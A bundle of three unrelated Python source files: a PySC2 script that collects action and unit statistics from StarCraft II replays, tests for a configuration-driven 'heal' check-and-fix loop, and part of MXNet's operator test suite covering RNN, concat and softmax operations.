# See the License for the specific language governing permissions and
# limitations under the License.
"""Dump out stats about all the actions that are in use in a set of replays."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import multiprocessing
import os
import signal
import sys
import threading
import time
from absl import app
from absl import flags
from future.builtins import range # pylint: disable=redefined-builtin
import queue
import six
from pysc2 import run_configs
from pysc2.lib import features
from pysc2.lib import point
from pysc2.lib import protocol
from pysc2.lib import remote_controller
from pysc2.lib import replay
from pysc2.lib import static_data
from pysc2.lib import gfile
from s2clientprotocol import common_pb2 as sc_common
from s2clientprotocol import sc2api_pb2 as sc_pb
FLAGS = flags.FLAGS
flags.DEFINE_integer("parallel", 1, "How many instances to run in parallel.")
flags.DEFINE_integer("step_mul", 8, "How many game steps per observation.")
flags.DEFINE_string("replays", None, "Path to a directory of replays.")
flags.mark_flag_as_required("replays")
FLAGS(sys.argv)
size = point.Point(16, 16)
interface = sc_pb.InterfaceOptions(
raw=True, score=False,
feature_layer=sc_pb.SpatialCameraSetup(width=24))
size.assign_to(interface.feature_layer.resolution)
size.assign_to(interface.feature_layer.minimap_resolution)
def sorted_dict_str(d):
return "{%s}" % ", ".join("%s: %s" % (k, d[k])
for k in sorted(d, key=d.get, reverse=True))
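# Editor's note (illustration): keys are sorted by value, descending, e.g.
# sorted_dict_str({"a": 1, "b": 3}) == "{b: 3, a: 1}"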
class ReplayStats(object):
"""Summary stats of the replays seen so far."""
def __init__(self):
self.replays = 0
self.steps = 0
self.camera_move = 0
self.select_pt = 0
self.select_rect = 0
self.control_group = 0
self.maps = collections.defaultdict(int)
self.races = collections.defaultdict(int)
self.unit_ids = collections.defaultdict(int)
self.valid_abilities = collections.defaultdict(int)
self.made_abilities = collections.defaultdict(int)
self.valid_actions = collections.defaultdict(int)
self.made_actions = collections.defaultdict(int)
self.buffs = collections.defaultdict(int)
self.upgrades = collections.defaultdict(int)
self.effects = collections.defaultdict(int)
self.crashing_replays = set()
self.invalid_replays = set()
def merge(self, other):
"""Merge another ReplayStats into this one."""
def merge_dict(a, b):
for k, v in six.iteritems(b):
a[k] += v
self.replays += other.replays
self.steps += other.steps
self.camera_move += other.camera_move
self.select_pt += other.select_pt
self.select_rect += other.select_rect
self.control_group += other.control_group
merge_dict(self.maps, other.maps)
merge_dict(self.races, other.races)
merge_dict(self.unit_ids, other.unit_ids)
merge_dict(self.valid_abilities, other.valid_abilities)
merge_dict(self.made_abilities, other.made_abilities)
merge_dict(self.valid_actions, other.valid_actions)
merge_dict(self.made_actions, other.made_actions)
merge_dict(self.buffs, other.buffs)
merge_dict(self.upgrades, other.upgrades)
merge_dict(self.effects, other.effects)
self.crashing_replays |= other.crashing_replays
self.invalid_replays |= other.invalid_replays
def __str__(self):
len_sorted_dict = lambda s: (len(s), sorted_dict_str(s))
len_sorted_list = lambda s: (len(s), sorted(s))
new_abilities = ((set(self.valid_abilities.keys())
| set(self.made_abilities.keys()))
- set(static_data.ABILITIES))
new_units = set(self.unit_ids) - set(static_data.UNIT_TYPES)
new_buffs = set(self.buffs) - set(static_data.BUFFS)
new_upgrades = set(self.upgrades) - set(static_data.UPGRADES)
return "\n\n".join((
"Replays: %s, Steps total: %s" % (self.replays, self.steps),
"Camera move: %s, Select pt: %s, Select rect: %s, Control group: %s" % (
self.camera_move, self.select_pt, self.select_rect,
self.control_group),
"Maps: %s\n%s" % len_sorted_dict(self.maps),
"Races: %s\n%s" % len_sorted_dict(self.races),
"Unit ids: %s\n%s" % len_sorted_dict(self.unit_ids),
"New units: %s \n%s" % len_sorted_list(new_units),
"Valid abilities: %s\n%s" % len_sorted_dict(self.valid_abilities),
"Made abilities: %s\n%s" % len_sorted_dict(self.made_abilities),
"New abilities: %s\n%s" % len_sorted_list(new_abilities),
"Valid actions: %s\n%s" % len_sorted_dict(self.valid_actions),
"Made actions: %s\n%s" % len_sorted_dict(self.made_actions),
"Buffs: %s\n%s" % len_sorted_dict(self.buffs),
"New buffs: %s\n%s" % len_sorted_list(new_buffs),
"Upgrades: %s\n%s" % len_sorted_dict(self.upgrades),
"New upgrades: %s\n%s" % len_sorted_list(new_upgrades),
"Effects: %s\n%s" % len_sorted_dict(self.effects),
"Crashing replays: %s\n%s" % len_sorted_list(self.crashing_replays),
"Invalid replays: %s\n%s" % len_sorted_list(self.invalid_replays),
))
class ProcessStats(object):
"""Stats for a worker process."""
def __init__(self, proc_id):
self.proc_id = proc_id
self.time = time.time()
self.stage = ""
self.replay = ""
self.replay_stats = ReplayStats()
def update(self, stage):
self.time = time.time()
self.stage = stage
def __str__(self):
return ("[%2d] replay: %10s, replays: %5d, steps: %7d, game loops: %7s, "
"last: %12s, %3d s ago" % (
self.proc_id, self.replay, self.replay_stats.replays,
self.replay_stats.steps,
self.replay_stats.steps * FLAGS.step_mul, self.stage,
time.time() - self.time))
def valid_replay(info, ping):
"""Make sure the replay isn't corrupt, and is worth looking at."""
if (info.HasField("error") or
info.base_build != ping.base_build or # different game version
info.game_duration_loops < 1000 or
len(info.player_info) != 2):
# Probably corrupt, or just not interesting.
return False
for p in info.player_info:
if p.player_apm < 10 or p.player_mmr < 1000:
# Low APM = player just standing around.
# Low MMR = corrupt replay or player who is weak.
return False
return True
class ReplayProcessor(multiprocessing.Process):
"""A Process that pulls replays and processes them."""
def __init__(self, proc_id, run_config, replay_queue, stats_queue):
super(ReplayProcessor, self).__init__()
self.stats = ProcessStats(proc_id)
self.run_config = run_config
self.replay_queue = replay_queue
self.stats_queue = stats_queue
def run(self):
signal.signal(signal.SIGTERM, lambda a, b: sys.exit()) # Exit quietly.
self._update_stage("spawn")
replay_name = "none"
while True:
self._print("Starting up a new SC2 instance.")
self._update_stage("launch")
try:
with self.run_config.start(
want_rgb=interface.HasField("render")) as controller:
self._print("SC2 Started successfully.")
ping = controller.ping()
for _ in range(300):
try:
replay_path = self.replay_queue.get()
except queue.Empty:
self._update_stage("done")
self._print("Empty queue, returning")
return
try:
replay_name = os.path.basename(replay_path)[:10]
self.stats.replay = replay_name
self._print("Got replay: %s" % replay_path)
self._update_stage("open replay file")
replay_data = self.run_config.replay_data(replay_path)
self._update_stage("replay_info")
info = controller.replay_info(replay_data)
self._print((" Replay Info %s " % replay_name).center(60, "-"))
self._print(info)
self._print("-" * 60)
if valid_replay(info, ping):
self.stats.replay_stats.maps[info.map_name] += 1
for player_info in info.player_info:
race_name = sc_common.Race.Name(
player_info.player_info.race_actual)
self.stats.replay_stats.races[race_name] += 1
map_data = None
if info.local_map_path:
self._update_stage("open map file")
map_data = self.run_config.map_data(info.local_map_path)
for player_id in [1, 2]:
self._print("Starting %s from player %s's perspective" % (
replay_name, player_id))
self.process_replay(controller, replay_data, map_data,
player_id)
else:
self._print("Replay is invalid.")
self.stats.replay_stats.invalid_replays.add(replay_name)
finally:
self.replay_queue.task_done()
self._update_stage("shutdown")
except (protocol.ConnectionError, protocol.ProtocolError, remote_controller.RequestError) as e:
print(e)
self.stats.replay_stats.crashing_replays.add(replay_name)
except KeyboardInterrupt:
return
def _print(self, s):
for line in str(s).strip().splitlines():
print("[%s] %s" % (self.stats.proc_id, line))
def _update_stage(self, stage):
self.stats.update(stage)
self.stats_queue.put(self.stats)
def process_replay(self, controller, replay_data, map_data, player_id):
"""Process a single replay, updating the stats."""
self._update_stage("start_replay")
controller.start_replay(sc_pb.RequestStartReplay(
replay_data=replay_data,
map_data=map_data,
options=interface,
observed_player_id=player_id))
feat = features.features_from_game_info(controller.game_info())
self.stats.replay_stats.replays += 1
self._update_stage("step")
controller.step()
while True:
self.stats.replay_stats.steps += 1
self._update_stage("observe")
obs = controller.observe()
for action in obs.actions:
act_fl = action.action_feature_layer
if act_fl.HasField("unit_command"):
self.stats.replay_stats.made_abilities[
act_fl.unit_command.ability_id] += 1
if act_fl.HasField("camera_move"):
self.stats.replay_stats.camera_move += 1
if act_fl.HasField("unit_selection_point"):
self.stats.replay_stats.select_pt += 1
if act_fl.HasField("unit_selection_rect"):
self.stats.replay_stats.select_rect += 1
if action.action_ui.HasField("control_group"):
self.stats.replay_stats.control_group += 1
try:
func = feat.reverse_action(action).function
except ValueError:
func = -1
self.stats.replay_stats.made_actions[func] += 1
for valid in obs.observation.abilities:
self.stats.replay_stats.valid_abilities[valid.ability_id] += 1
for u in obs.observation.raw_data.units:
self.stats.replay_stats.unit_ids[u.unit_type] += 1
for b in u.buff_ids:
self.stats.replay_stats.buffs[b] += 1
for u in obs.observation.raw_data.player.upgrade_ids:
self.stats.replay_stats.upgrades[u] += 1
for e in obs.observation.raw_data.effects:
self.stats.replay_stats.effects[e.effect_id] += 1
for ability_id in feat.available_actions(obs.observation):
self.stats.replay_stats.valid_actions[ability_id] += 1
if obs.player_result:
break
self._update_stage("step")
controller.step(FLAGS.step_mul)
def stats_printer(stats_queue):
"""A thread that consumes stats_queue and prints them every 10 seconds."""
proc_stats = [ProcessStats(i) for i in range(FLAGS.parallel)]
print_time = start_time = time.time()
width = 107
running = True
while running:
print_time += 10
while time.time() < print_time:
try:
s = stats_queue.get(True, print_time - time.time())
if s is None: # Signal to print and exit NOW!
running = False
break
proc_stats[s.proc_id] = s
except queue.Empty:
pass
replay_stats = ReplayStats()
for s in proc_stats:
replay_stats.merge(s.replay_stats)
print((" Summary %0d secs " % (print_time - start_time)).center(width, "="))
print(replay_stats)
print(" Process stats ".center(width, "-"))
print("\n".join(str(s) for s in proc_stats))
print("=" * width)
def replay_queue_filler(replay_queue, replay_list):
"""A thread that fills the replay_queue with replay filenames."""
for replay_path in replay_list:
replay_queue.put(replay_path)
def main(unused_argv):
"""Dump stats about all the actions that are in use in a set of replays."""
run_config = run_configs.get()
if not gfile.Exists(FLAGS.replays):
sys.exit("{} doesn't exist.".format(FLAGS.replays))
stats_queue = multiprocessing.Queue()
stats_thread = threading.Thread(target=stats_printer, args=(stats_queue,))
try:
# For some reason buffering everything into a JoinableQueue makes the
# program not exit, so save it into a list then slowly fill it into the
# queue in a separate thread. Grab the list synchronously so we know there
# is work in the queue before the SC2 processes actually run, otherwise
# the replay_queue.join below succeeds without doing any work, and exits.
print("Getting replay list:", FLAGS.replays)
replay_list = sorted(run_config.replay_paths(FLAGS.replays))
print(len(replay_list), "replays found.")
if not replay_list:
return
if not FLAGS["sc2_version"].present: # ie not set explicitly.
version = replay.get_replay_version(
run_config.replay_data(replay_list[0]))
run_config = run_configs.get(version=version)
print("Assuming version:", version.game_version)
print()
stats_thread.start()
replay_queue = multiprocessing.JoinableQueue(FLAGS.parallel * 10)
replay_queue_thread = threading.Thread(target=replay_queue_filler,
args=(replay_queue, replay_list))
replay_queue_thread.daemon = True
replay_queue_thread.start()
for i in range(min(len(replay_list), FLAGS.parallel)):
p = ReplayProcessor(i, run_config, replay_queue, stats_queue)
p.daemon = True
p.start()
time.sleep(1) # Stagger startups, otherwise they seem to conflict somehow
replay_queue.join() # Wait for the queue to empty.
except KeyboardInterrupt:
print("Caught KeyboardInterrupt, exiting.")
finally:
stats_queue.put(None) # Tell the stats_thread to print and exit.
if stats_thread.is_alive():
stats_thread.join()
if __name__ == "__main__":
app.run(main)
|
test_heal.py
|
import datetime
import json
import threading
import time
import heal
def test_configuration_directory_not_exists(tmp_path, capsys):
configuration_directory = tmp_path.joinpath("not-exists")
status_file = tmp_path.joinpath("status-file")
heal.heal(configuration_directory, status_file, threading.Event())
assert capsys.readouterr().out == f"exiting: {configuration_directory} must exist and be a directory\n"
assert not status_file.exists()
def test_configuration_directory_not_a_directory(tmp_path, capsys):
configuration_directory = tmp_path.joinpath("file")
configuration_directory.touch()
status_file = tmp_path.joinpath("status-file")
heal.heal(configuration_directory, status_file, threading.Event())
assert capsys.readouterr().out == f"exiting: {configuration_directory} must exist and be a directory\n"
assert not status_file.exists()
PROGRESSIVE_AND_KO_INPUT = """
---
- check: false
fix: true
rank: 1
""".lstrip()
PROGRESSIVE_AND_KO_OUTPUT_1 = """
watching: {0}
configuration directory has changed
reading configuration
filtering modes and checks
""".lstrip()
PROGRESSIVE_AND_KO_OUTPUT_2 = """
configuration directory has changed
reading configuration
filtering modes and checks
checks have changed
filtering active checks
active: {"check": "false", "fix": "true", "rank": 1}
[1] failed: false
[1] fixing: true
[1] failed again: false
exiting: fatal error
""".lstrip()
def test_progressive_and_ko(tmp_path, capsys):
# empty configuration
configuration_directory = tmp_path.joinpath("config")
configuration_directory.mkdir()
status_file = tmp_path.joinpath("status-file")
thread = threading.Thread(target=heal.heal, args=(configuration_directory, status_file, threading.Event(), 0.1))
thread.start()
time.sleep(0.15) # 2 cycles
assert json.loads(status_file.read_text()).get("status") == "ok"
assert capsys.readouterr().out == PROGRESSIVE_AND_KO_OUTPUT_1.format(configuration_directory)
# adding failing configuration
configuration_directory.joinpath("failing-configuration").write_text(PROGRESSIVE_AND_KO_INPUT)
thread.join()
assert json.loads(status_file.read_text()).get("status") == "ko"
assert capsys.readouterr().out == PROGRESSIVE_AND_KO_OUTPUT_2
# previous run failed, so if we start it again, it should immediately fail
heal.heal(configuration_directory, status_file, threading.Event())
assert capsys.readouterr().out == f"exiting: ko status found in {status_file}\n"
OK_INPUT = """
---
- check: "[ ! -f {0} ]"
fix: rm {0}
rank: 1
""".lstrip()
OK_OUTPUT = """
watching: {0}
configuration directory has changed
reading configuration
filtering modes and checks
checks have changed
filtering active checks
active: {{"check": "[ ! -f {1} ]", "fix": "rm {1}", "rank": 1}}
[1] failed: [ ! -f {1} ]
[1] fixing: rm {1}
[1] fix successful
[1] failed: [ ! -f {1} ]
[1] fixing: rm {1}
[1] fix successful
exiting: loop-ending signal
""".lstrip()
def test_ok(tmp_path, capsys):
# regular configuration
flag = tmp_path.joinpath("flag")
configuration_directory = tmp_path.joinpath("config")
configuration_directory.mkdir()
configuration_directory.joinpath("config-file").write_text(OK_INPUT.format(flag))
status_file = tmp_path.joinpath("status-file")
event = threading.Event()
thread = threading.Thread(target=heal.heal, args=(configuration_directory, status_file, event, 0.01))
thread.start()
# lots of cycles
time.sleep(0.2)
status_1 = json.loads(status_file.read_text())
assert status_1.get("status") == "ok"
# first problem
flag.touch()
time.sleep(0.1)
status_2 = json.loads(status_file.read_text())
assert status_2.get("status") == "ok"
assert datetime.datetime.fromisoformat(status_2.get("timestamp")) > datetime.datetime.fromisoformat(status_1.get("timestamp"))
# second problem
flag.touch()
time.sleep(0.2)
status_3 = json.loads(status_file.read_text())
assert status_3.get("status") == "ok"
assert datetime.datetime.fromisoformat(status_3.get("timestamp")) > datetime.datetime.fromisoformat(status_2.get("timestamp"))
# normal interruption
event.set()
thread.join()
assert capsys.readouterr().out == OK_OUTPUT.format(configuration_directory, flag)
|
test_operator.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: skip-file
from __future__ import print_function
from __future__ import division
import numpy as np
import mxnet as mx
import copy
import math
import random
import itertools
from distutils.version import LooseVersion
from numpy.testing import assert_allclose, assert_array_equal
from mxnet.test_utils import *
from mxnet.operator import *
from mxnet.base import py_str, MXNetError, _as_list
from common import assert_raises_cudnn_not_satisfied, assert_raises_cuda_not_satisfied, assertRaises
from common import xfail_when_nonstandard_decimal_separator, with_environment
import pytest
import os
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
@pytest.mark.serial
def test_rnn_with_new_param():
rnn_modes = ['rnn_relu', 'rnn_tanh', 'gru', 'lstm']
ngates_ = [1, 1, 3, 4]
num_layers, input_size, seq_len, batch_size, state_size = 3, 128, 5, 64, 8
for bidirectional in [False, True]:
directions = 2 if bidirectional else 1
for mode, ngates in zip(rnn_modes, ngates_):
first_layer_size = (input_size * state_size + state_size * state_size + state_size * 2) * ngates
rest_layer_size = (state_size * directions * state_size + state_size * state_size + state_size * 2) \
* ngates * (num_layers - 1)
param_size = (first_layer_size + rest_layer_size) * directions
sym = mx.sym.RNN(mode=mode, num_layers=num_layers, bidirectional=bidirectional,
state_outputs=False, state_size=state_size, name='rnn')
bind_dict = {
'rnn_data': mx.ndarray.random.uniform(low=-1, high=1, shape=(seq_len, batch_size, input_size)),
'rnn_parameters': mx.ndarray.random.uniform(low=-1, high=1, shape=(param_size)),
'rnn_state': mx.ndarray.zeros(shape=(num_layers * directions, batch_size, state_size))
}
if mode == 'lstm':
bind_dict['rnn_state_cell'] = mx.ndarray.zeros(
shape=(num_layers * directions, batch_size, state_size))
ex = sym._bind(default_device(), bind_dict)
ex.forward(is_train=True)
ex01 = ex.output_dict['rnn_output'].asnumpy()
ex.forward(is_train=False)
ex02 = ex.output_dict['rnn_output'].asnumpy()
assert_allclose(ex01, ex02, rtol=1e-2, atol=1e-4)
bind_dict['rnn_parameters'] = mx.ndarray.random.uniform(low=-1, high=1, shape=(param_size))
ex.copy_params_from(bind_dict)
ex.forward(is_train=True)
ex03 = ex.output_dict['rnn_output'].asnumpy()
ex.forward(is_train=False)
ex04 = ex.output_dict['rnn_output'].asnumpy()
assert_allclose(ex03, ex04, rtol=1e-2, atol=1e-4)
@pytest.mark.serial
def test_lstm_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
CX = mx.sym.Variable('state_cell')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX, state_cell=CX,
state_size=H, num_layers=5, mode='lstm', p=0.5, state_outputs=True, name='LSTM')
exe = rnn._simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
@pytest.mark.serial
def test_gru_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX,
state_size=H, num_layers=5, mode='gru', p=0.5, state_outputs=True, name='GRU')
exe = rnn._simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
@pytest.mark.serial
def test_rnntanh_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX,
state_size=H, num_layers=5, mode='rnn_tanh', p=0.5, state_outputs=True, name='RNN_TANH')
exe = rnn._simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
@pytest.mark.serial
def test_rnnrelu_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX,
state_size=H, num_layers=5, mode='rnn_relu', p=0.5, state_outputs=True, name='RNN_RELU')
exe = rnn._simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
def test_RNN_float64():
if default_device().device_type == 'gpu':
return
sym = mx.sym.RNN(
mx.sym.Variable('in'),
mx.sym.Variable('par'),
mx.sym.Variable('s'),
state_size = (2),
num_layers = 1,
mode = 'rnn_tanh'
)
dtype = 'float64'
explicit_grad = {
'in': mx.nd.ones([2, 1, 2], dtype=dtype),
'par': mx.nd.ones([12], dtype=dtype),
's': mx.nd.ones([1, 1, 2], dtype=dtype)
}
args_grad = explicit_grad
grad_req = 'write'
ex = sym._bind(default_device(),
{
'in': mx.nd.ones([2, 1, 2], dtype=dtype),
'par': mx.nd.ones([12], dtype=dtype),
's': mx.nd.ones([1, 1, 2], dtype=dtype)
},
args_grad = args_grad,
grad_req = grad_req
)
ex.forward()
ex.outputs[0].wait_to_read()
def np_softmax(x, axis=-1, temperature=1.0):
x = x - np.max(x, axis=axis, keepdims=True)
x = np.exp(x/temperature)
x /= np.sum(x, axis=axis, keepdims=True)
return x
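# Editor's note: an illustrative sketch, not part of the original test suite. np_softmax above
# is the NumPy reference used by the softmax checks; the hypothetical helper below just shows
# that each row sums to one and that a lower temperature sharpens the distribution.
def _np_softmax_example():
    x = np.array([[1.0, 2.0, 3.0]])
    p = np_softmax(x)                        # plain softmax, rows sum to 1
    p_sharp = np_softmax(x, temperature=0.1) # low temperature concentrates the mass
    assert np.allclose(p.sum(axis=-1), 1.0)
    assert p_sharp.max() > p.max()
    return p, p_sharp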
def check_elementwise_sum_with_shape(shape, n):
# forward
inputs = [mx.symbol.Variable('arg%d' % i) for i in range(n)]
out = mx.symbol.ElementWiseSum(*inputs, name='esum')
arr = [mx.nd.empty(shape) for i in range(n)]
arr_grad = [mx.nd.empty(shape) for i in range(n)]
for i in range(n):
arr[i][:] = np.random.uniform(-10, 10, shape)
exec1 = out._bind(default_device(),
args=arr,
args_grad=arr_grad)
exec1.forward(is_train=True)
out1 = exec1.outputs[0]
out = sum(a.asnumpy() for a in arr)
assert_almost_equal(out, out1, rtol=1e-5, atol=1e-5)
out_grad = mx.nd.empty(shape)
out_grad[:] = np.random.uniform(-10, 10, shape)
# backward
exec1.backward([out_grad])
for a in arr_grad:
assert_almost_equal(a, out_grad, rtol=1e-5, atol=1e-5)
@pytest.mark.serial
def test_elementwise_sum():
nrepeat = 2
maxdim = 4
for _ in range(nrepeat):
for dim in range(1, maxdim):
shape = tuple(np.random.randint(1, int(1000**(1.0/dim)), size=dim))
check_elementwise_sum_with_shape(shape, np.random.randint(1, 8))
def check_concat_with_shape(shapes, dimension, skip_second):
    # If skip_second is True, the second argument will not have a gradient;
    # this exercises the case reported in #1130.
n = len(shapes)
# forward
target_dim = 0
for shape in shapes:
target_dim += shape[dimension]
inputs = [mx.symbol.Variable('arg%d' % i) for i in range(n)]
out = mx.symbol.Concat(*inputs, name='conc',dim=dimension)
arr = [mx.nd.empty(shape) for shape in shapes]
for i in range(n):
arr[i][:] = shapes[i][dimension]
arr_np = [np.copy(narray.asnumpy()) for narray in arr]
arr_grad = [mx.nd.empty(shape) for shape in shapes]
dict_grad = {}
arg_names = out.list_arguments()
for name, g in zip(arg_names, arr_grad):
if not skip_second or name != 'arg1':
dict_grad[name] = g
args = out.list_arguments()
arg_shapes, out_shapes, aux_shapes = out.infer_shape(**dict(zip(args, shapes)))
out_grad = mx.nd.empty(out_shapes[0])
exec1 = out._bind(default_device(),
args=arr,
args_grad=dict_grad)
exec1.forward(is_train=True)
out1 = exec1.outputs[0]
ret = np.concatenate([narray.asnumpy() for narray in arr], axis=dimension)
assert_almost_equal(out1, ret)
# backward
out1.copyto(out_grad)
out_grad[:] += 1
exec1.backward([out_grad])
for i, name in enumerate(arg_names):
if not skip_second or name != 'arg1':
grad = dict_grad[name]
np_grad = arr_np[i]
assert_almost_equal(grad, np_grad + 1)
def test_concat():
for dimension in range(4):
n = 2
merge = [2, 3, 4, 5, 6]
a = 2
b = 3
c = 4
# test 2D
if dimension<2:
for dim in range(2, 6):
shapes = []
for i in range(dim):
if dimension == 0:
shapes.append((merge[i], a))
elif dimension == 1:
shapes.append((a, merge[i]))
check_concat_with_shape(shapes,dimension,True)
check_concat_with_shape(shapes,dimension,False)
# Test negative dim
check_concat_with_shape(shapes, dimension - 2, True)
check_concat_with_shape(shapes, dimension - 2, False)
#test 3D
if dimension<3:
for dim in range(2, 6):
shapes = []
for i in range(dim):
if dimension == 0:
shapes.append((merge[i], a,b))
elif dimension ==1:
shapes.append((a,merge[i],b))
elif dimension ==2:
shapes.append((a,b,merge[i]))
check_concat_with_shape(shapes,dimension,True)
check_concat_with_shape(shapes,dimension,False)
# Test negative dim
check_concat_with_shape(shapes, dimension - 3, True)
check_concat_with_shape(shapes, dimension - 3, False)
# test 4D
for dim in range(2, 6):
shapes = []
for i in range(dim):
if dimension == 0:
shapes.append((merge[i],a,b,c))
elif dimension == 1:
shapes.append((a,merge[i],b,c))
elif dimension ==2:
shapes.append((a,b,merge[i],c))
elif dimension ==3:
shapes.append((a,b,c,merge[i]))
check_concat_with_shape(shapes,dimension,True)
check_concat_with_shape(shapes,dimension,False)
# Test negative dim
check_concat_with_shape(shapes, dimension - 4, True)
check_concat_with_shape(shapes, dimension - 4, False)
def test_slice_channel():
def check_slice_channel(data_ndim, axis, num_outputs, squeeze_axis):
ins = []
if squeeze_axis:
shape = np.random.randint(2, 5, data_ndim).tolist()
shape[axis] = num_outputs
out_ele_shape = [ele for ele in shape]
del out_ele_shape[axis]
else:
shape = np.random.randint(1, 5, data_ndim).tolist()
shape[axis] *= num_outputs
out_ele_shape = [ele for ele in shape]
out_ele_shape[axis] //= num_outputs
data_npy = np.random.normal(size=shape)
out_grads_npy = [np.random.normal(size=out_ele_shape) for i in range(num_outputs)]
data = mx.sym.Variable('data')
sym = mx.sym.SliceChannel(data=data, num_outputs=num_outputs, axis=axis, squeeze_axis=squeeze_axis)
exe = sym._simple_bind(ctx=default_device(), data=data_npy.shape)
outputs = exe.forward(is_train=True, data=data_npy)
assert len(exe.outputs) == num_outputs
for i in range(num_outputs):
            gt = data_npy.take(np.arange(i * shape[axis]/num_outputs,
                                         (i+1) * shape[axis]/num_outputs).astype(int), axis=axis)
if squeeze_axis:
assert_almost_equal(outputs[i], gt.reshape(outputs[i].shape))
else:
assert_almost_equal(outputs[i], gt)
# test backward
ograd = [mx.nd.array(ele, dtype=outputs[i].dtype) for i, ele in enumerate(out_grads_npy)]
exe.backward(out_grads=ograd)
if squeeze_axis:
assert_almost_equal(exe.grad_arrays[0],
np.concatenate([np.expand_dims(ele, axis=axis) for ele in out_grads_npy],
axis=axis))
else:
assert_almost_equal(exe.grad_arrays[0],
np.concatenate(out_grads_npy, axis=axis))
check_slice_channel(data_ndim=2, axis=1, num_outputs=3, squeeze_axis=True)
check_slice_channel(data_ndim=4, axis=2, num_outputs=3, squeeze_axis=False)
check_slice_channel(data_ndim=3, axis=-1, num_outputs=2, squeeze_axis=False)
check_slice_channel(data_ndim=5, axis=-2, num_outputs=3, squeeze_axis=True)
def test_python_op():
X = mx.symbol.Variable('X')
op = mx.operator.NumpyOp()
s = op.get_symbol(X, name='numpy_op')
x = mx.ndarray.ones((10))*10
dx = mx.ndarray.zeros((10))
dy = mx.ndarray.ones((10))
exec1 = s._bind(default_device(), args=[x], args_grad = {'X': dx})
exec1.forward(is_train=True)
assert_almost_equal(x, exec1.outputs[0])
exec1.backward(dy)
assert_almost_equal(dy, dx)
def test_swapaxes():
data = mx.symbol.Variable('data')
shape = (2, 3, 4)
data_tmp = np.ones(shape)
data_tmp[0] = 1
data_tmp[1] = 2
arr_data = mx.nd.array(data_tmp)
swap0 = mx.symbol.SwapAxis(data=data, dim1=0, dim2=2)
swap = mx.symbol.SwapAxis(data=swap0, dim1=1, dim2=2)
exe_c = swap._bind(default_device(), args=[arr_data])
exe_c.forward(is_train=True)
out = exe_c.outputs[0]
swap0_ = np.swapaxes(data_tmp, 0, 2)
swap_ = np.swapaxes(swap0_, 1, 2)
assert_almost_equal(out, swap_)
config = [((1, 1, 2), 0, 1),
((1, 1, 2), -1, -2),
((4, 5, 6, 7), 1, 1),
((4, 5, 6, 7), 2, 3),
((4, 5, 6, 7), -2, 2),
((4, 5, 6, 7), -2, -3)]
for shape, axis1, axis2 in config:
data_np = np.random.uniform(size=shape)
data_mx = mx.nd.array(data_np, dtype=data_np.dtype)
ret_np = np.swapaxes(data_np, axis1=axis1, axis2=axis2)
ret_mx = mx.symbol.SwapAxis(data, dim1=axis1, dim2=axis2)
exe_c = ret_mx._bind(default_device(), args=[data_mx])
exe_c.forward(is_train=True)
out = exe_c.outputs[0]
assert_almost_equal(out, ret_np)
@xfail_when_nonstandard_decimal_separator
def test_scalarop():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)*5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = 2 / (4-((1+data+1)*2/5)-0.8-(data!=0))
npout_1 = (4-((1+data_tmp+1)*2/5)-0.8-(data_tmp!=0))
npout = 2/npout_1
check_symbolic_forward(test, [data_tmp], [npout])
npout_grad = 2.*2/5
npout_grad = 2*npout_grad /(npout_1 *npout_1 )
check_symbolic_backward(test, [data_tmp], [np.ones(shape)*2], [npout_grad])
def test_scalar_pow():
data = mx.symbol.Variable('data')
shape = (1, 1)
data_tmp = np.ones(shape)
test = data ** 2
check_numeric_gradient(test, [data_tmp])
check_symbolic_forward(test, [data_tmp], [data_tmp ** 2])
check_symbolic_backward(test, [data_tmp], [np.ones(shape)], [2 * data_tmp])
def test_symbol_pow():
shape = (1, 1)
data = mx.symbol.Variable('data')
data_tmp = np.ones(shape)*2
exp = mx.symbol.Variable('exp')
exp_tmp = np.ones(shape)*3
test = data**exp
check_numeric_gradient(test, [data_tmp, exp_tmp])
check_symbolic_forward(test, [data_tmp, exp_tmp], [data_tmp**exp_tmp])
data_dir = data_tmp**(exp_tmp - 1) * exp_tmp
exp_dir = data_tmp**(exp_tmp) * np.log(data_tmp)
check_symbolic_backward(test, [data_tmp, exp_tmp], [np.ones(shape)], [data_dir, exp_dir])
def test_fully_connected():
# Create data of given shape as a uniform distribution centered on 0.0
def random_data(shape, dtype=np.float32):
return mx.nd.random.uniform(low=-0.5,
high=0.5, shape=shape, dtype=dtype)
data = mx.sym.var("data")
fc_weight = mx.sym.var("weight")
fc_bias = mx.sym.var("bias")
fc = mx.sym.FullyConnected(data=data, weight=fc_weight, bias=fc_bias, num_hidden=10, no_bias=False, name='fc')
